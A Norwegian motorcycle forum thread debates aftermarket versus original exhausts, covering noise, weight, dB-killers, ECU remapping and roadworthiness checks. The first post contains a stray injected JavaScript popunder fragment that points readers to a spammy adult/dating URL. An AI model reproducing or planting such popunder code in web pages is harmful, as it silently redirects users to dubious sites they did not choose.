Side 1 av 2

Alternativ eksos vs original.

Lagt inn: 29 aug 2023, 08:54
av dypen
Det har bestandig vært gromt med «sports» eksos som ser bedre ut i mange tillfeller, lydbilde, lavere vekt osv men …

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Re: Alternativ eksos vs original.

Lagt inn: 29 aug 2023, 09:23
av AJ
Var på dette slip-on kjøret selv inntil jeg skaffet meg min første 1290.
Siden har jeg ikke på noen måte hatt interesse av å bytte eksospotte/anlegg.
Kommer heller ikke til å skje med V7'ern, som skal forbli mest mulig original. Eneste uorignale på denne er at den originale kromma salbøyla er byttet ut med GIVI lastestativet siden dette måtte til for at sykkelen skulle framstå som en tursykkel slik jeg ville ha den, med blant toppboksmulighet.

Men uoriginal slip-on... :[-( .

Re: Alternativ eksos vs original.

Lagt inn: 29 aug 2023, 09:39
av dypen
Det å bare montere såkalt sports eksos eller slip-on uten å gjøre noe mer blir i mange tillfeller bare lyd og ikke noe mer, i noen tilfeller omtales de negative sider i YouTube filmen. Noen mc produsenter som ex Ducati tilbyr sports eksos men da må også ECU programmeres.

Lettvektere med sports eksos uten DB-killer er utbredt men er det noen her som kan si noe om det øker effekten … :-k

Re: Alternativ eksos vs original.

Lagt inn: 29 aug 2023, 09:47
av SveinHa
Grei oppsummering i den videoen.

Poden (som har begynt opplæring til A1 lappen) er veldig hekta på at sykkelen skal bråke og Yamaha YZF125 som han kjøpte for konfirmasjonspengene hadde uoriginal eksos medfølgende og den SKAL han absolutt bruke. Tror ikke egentlig den er så ille men bråker alt for mye for mine ører... Iflg poden så høres original eksos ut som en plenklipper...

Selv er jeg med interessert i lydbildet og at det ikke skal være bråk. For noen år siden hadde jeg en Range Rover med V8 turbodiesel og var SVÆRT nære på å modifisere eksosen fordi en kunne ikke høre at det var en V8... Når en først har en V8 under panseret så skal en HØRE det men som sagt uten at det bråker...

Bimbo har ikke spesielt fin lyd (evt. at jeg ikke har lært å like den enda) men jeg kommer ikke til å gjøre noe med den...

I den tiden 2-taktere var vanlig i lette MC var det vanlig å ta ut innmaten i potten men 2-taktere er langt mer følsomme for godt avstemt eksos så dette medførte i praktisk talt alle tilfeller LAVERE effekt og betydelig mer støy.

Re: Alternativ eksos vs original.

Lagt inn: 29 aug 2023, 11:34
av kaLARSnikov
Uten å ha sett videoen så syns jeg på generelt grunnlag at lyden er en del av opplevelsen og det er mange sykler som i original stand høres nitriste ut.

Samtidig er jeg opptatt av å ikke måtte trenge å risikere å måtte bruke tid på visninger og slikt, så for meg er det også viktig at eventuelle uoriginale anlegg er lovlige å kjøre med. Er derfor veldig fornøyd med Dominator slip-on på V-strom'en. Noe høyere lyd enn originalt - ikke mye - men mye penere lydbilde. Noen merkbar ytelsesforskjell er det nok tvilsomt, men en vektreduksjon på fire kilo kommer naturligvis godt med som en motvekt (høhø) til alle kiloene jeg har lagt til i form av ymse ekstrautstyr og dilldall.

På Intruderen jeg hadde tidligere så hadde noen borret en haug med ekstra hull bakerst på pottene. Det var gøy de første par ukene, så ble man litt lei av at det skulle bråke så styggjævlig mye hele tiden...

Har et par kamerater som tidvis har kjørt småkraftige sykler med uoriginale potter og uten db-killere. Enkelte av de variantene er også godt over nivået jeg personlig hadde vært interessert i å kjøre med i lengden.

Re: Alternativ eksos vs original.

Lagt inn: 29 aug 2023, 11:35
av mekkern
Ingen har ennå greid å lage en liten lyddemper som beholder effekten-strengere krav/høyere effekt gir større lyddempere/mer volum.
En slipon potte med DB killer går motsatt vei (mindre effektiv enn OEM) med mer motstand.DB-killer er den mest brutale formen for lyddemping og det som gir mest motstand.

Når det gjelder 125ccm 4t så får en ikke noe mer effekt med ei bråkepotte med DB killer-heller mindre.Uten mulig en halv hest mer på topp men mindre i lav/ mellomregister(som gir intrykk av mer effekt når det begynner å dra).OG at det høres ut som defekt jordfreser-i tillegg til hatet fra alle.

De fleste MC i dag har ved skifte av slipon kun en lyd/vektmessig effekt(og ofte litt mindre effekt pga db killer)
Tar man ut db killeren må man i noen tilfelle remappe ecu grunnet begrenset rekalibrering via O2 sensor.
En åpen slipon kan i kombinasjon med remapping gi noen hk -spesielt i mellomregister men også et par på topp.
skal man ha max effekt må hele anlegget byttes og ecu remappes. Som regel vil en da ha en del mer toppeffekt og en del i øyre mellomregister.
En remapping kan de fleste mc ha god effekt av når det kommer til kjørbarhet og effektkurve-men på bekostning av miljø da.

når det gjelder støy:
OEM-slipon m dbkiller-slipon uten dbkiller-helanlegg-i den rekkefølgen.
Men det er veldig forskjell i slipons når det kommer til støy/lydbilde også.

Re: Alternativ eksos vs original.

Lagt inn: 29 aug 2023, 14:06
av FredrikE24
Originaleksosen er jo den beste, men vil man ha mer støy så er vel uoriginal demper en grei løsning, men man oppnår nok ikke høyere effekt. Snarere tvert i mot.

Jeg kjørte med helanlegg og re-map på min sykkel. Gikk som fy på toppen av registeret og gikk som en dass på lavt sammenlignet med originalet. At det var mer effekt enn originalen var det ingen tvil om, da forhjulet løftet seg helt fint med fullt pådrag med, og aldri med originalen.

Etter å ha kjørt på autobahn siste dagene forstår jeg hvordan BMW har tunet inn sykkelen. Det drar godt over hele registeret, men særlig på et område på omtrent 2500 omdreininger litt over midten på registeret.

Re: Alternativ eksos vs original.

Lagt inn: 29 aug 2023, 14:07
av FredrikE24
Jeg kjører nå med original eksos og jeg føler ikke behovet for bråkepotte lenger. Det bråket sykt.

Re: Alternativ eksos vs original.

Lagt inn: 29 aug 2023, 15:19
av JoeHugin
De fleste som bytter eksos med påskuddet "vektsparing" kunne i de fleste tilfeller heller droppet kebab en måned og gått ned de 2-3 kiloene selv. 🤫

Re: Alternativ eksos vs original.

Lagt inn: 30 aug 2023, 07:54
av utc
JoeHugin skrev: 29 aug 2023, 15:19 De fleste som bytter eksos med påskuddet "vektsparing" kunne i de fleste tilfeller heller droppet kebab en måned og gått ned de 2-3 kiloene selv. 🤫
Bullseye :twothumbs:

Vi kan jo spørre hvorfor folk vil ha mer lyd. Ikke går det fortere og ikke sparer du fuel. Så da koker det ned til at de fleste av disse som vil ha masse støy har et ønske om å bli sett og akseptert. Ergo trekker vi fram en av tesene til Sigmund Freud og konkluderer med at de fleste av disse uten db-killer ikke ble sett som barn men at de med lyden søker å bli sett, anerkjent og akseptert. Imidlertid er som regel resultatet stikk motsatt.

Re: Alternativ eksos vs original.

Lagt inn: 30 aug 2023, 12:01
av Greddy
Jeg bruker ørepropper for å dempe vindstøy som er på over 100dB. Med ørepropper hører jeg såvidt motorlyden. Da er det greit å ha anlegg som har litt lyd i seg, slik jeg kan høre at nå skal det gå fort.

Re: Alternativ eksos vs original.

Lagt inn: 30 aug 2023, 12:58
av utc
Greddy skrev: 30 aug 2023, 12:01 slik jeg kan høre at nå skal det gå fort.
Det er mye enklere å bruke et speedometer for å se hastigheten :lol Anbefaler det istedenfor å høre farten
Skjermbilde 2023-08-30 125642.jpg

Re: Alternativ eksos vs original.

Lagt inn: 30 aug 2023, 13:03
av kjellv
SveinHa skrev:Grei oppsummering i den videoen.

Poden (som har begynt opplæring til A1 lappen) er veldig hekta på at sykkelen skal bråke og Yamaha YZF125 som han kjøpte for konfirmasjonspengene hadde uoriginal eksos medfølgende og den SKAL han absolutt bruke. Tror ikke egentlig den er så ille men bråker alt for mye for mine ører... Iflg poden så høres original eksos ut som en plenklipper...

Selv er jeg med interessert i lydbildet og at det ikke skal være bråk. For noen år siden hadde jeg en Range Rover med V8 turbodiesel og var SVÆRT nære på å modifisere eksosen fordi en kunne ikke høre at det var en V8... Når en først har en V8 under panseret så skal en HØRE det men som sagt uten at det bråker...

Bimbo har ikke spesielt fin lyd (evt. at jeg ikke har lært å like den enda) men jeg kommer ikke til å gjøre noe med den...

I den tiden 2-taktere var vanlig i lette MC var det vanlig å ta ut innmaten i potten men 2-taktere er langt mer følsomme for godt avstemt eksos så dette medførte i praktisk talt alle tilfeller LAVERE effekt og betydelig mer støy.
Du kan hilse poden med at en 1-syl 125cc får ikke finere lyd av eksosanlegg uten db-killer. Det blir bare mer lyd, og det er ikke det samme. Det blir som å vrenge opp lyden på et lite stereoanlegg. Eller som en gressklipper uten eksospotte..
Dyrt blir det også den dagen han blir stoppet med beskjed om å bestille time hos bts for visning. Da går de over hele sykkelen og slår ned på det meste som er uoriginalt.

Sent fra min SM-A515F via Tapatalk


Re: Alternativ eksos vs original.

Lagt inn: 30 aug 2023, 13:18
av SveinHa
kjellv skrev: 30 aug 2023, 13:03 Du kan hilse poden med at en 1-syl 125cc får ikke finere lyd av eksosanlegg uten db-killer. Det blir bare mer lyd, og det er ikke det samme. Det blir som å vrenge opp lyden på et lite stereoanlegg. Eller som en gressklipper uten eksospotte..
Dyrt blir det også den dagen han blir stoppet med beskjed om å bestille time hos bts for visning. Da går de over hele sykkelen og slår ned på det meste som er uoriginalt.

Sent fra min SM-A515F via Tapatalk
Helt enig men poden har en formening om at det er bare å sette på originalt anlegg og ta en gratis visning hos SVV så er alt i orden igjen... Prøver å si at det er gjerne ikke så enkelt men han diskuterer med kompisene...

Re: Alternativ eksos vs original.

Lagt inn: 30 aug 2023, 13:29
av dypen
Når vi kjørte lettvekter kan jeg ikke huske det var tema å demontere eksosen eller modifisere på noen måte, kjørte original på AC50, LS2, RS og H1 500. Det var vel ikke noe å få kjøpt til disse på den tida og om så var så var pengene prioritert på andre ting hvis det var penger til overs :) Det var først når det ble 4-takter det ble Bassani og Kerker eksos med innmat.

Det er en del yngre i nabolaget her som kjører lettvekter som bråker noe sinnsykt, frem å tilbake girer og står i til alle døgnets tider med samme kjørerute og kjøremønster i 30 km sone hvor det kan dukke opp en unge hvor som helst. Det overrasker meg att ingen bryr seg, både med tanke på bråk og hastigheten.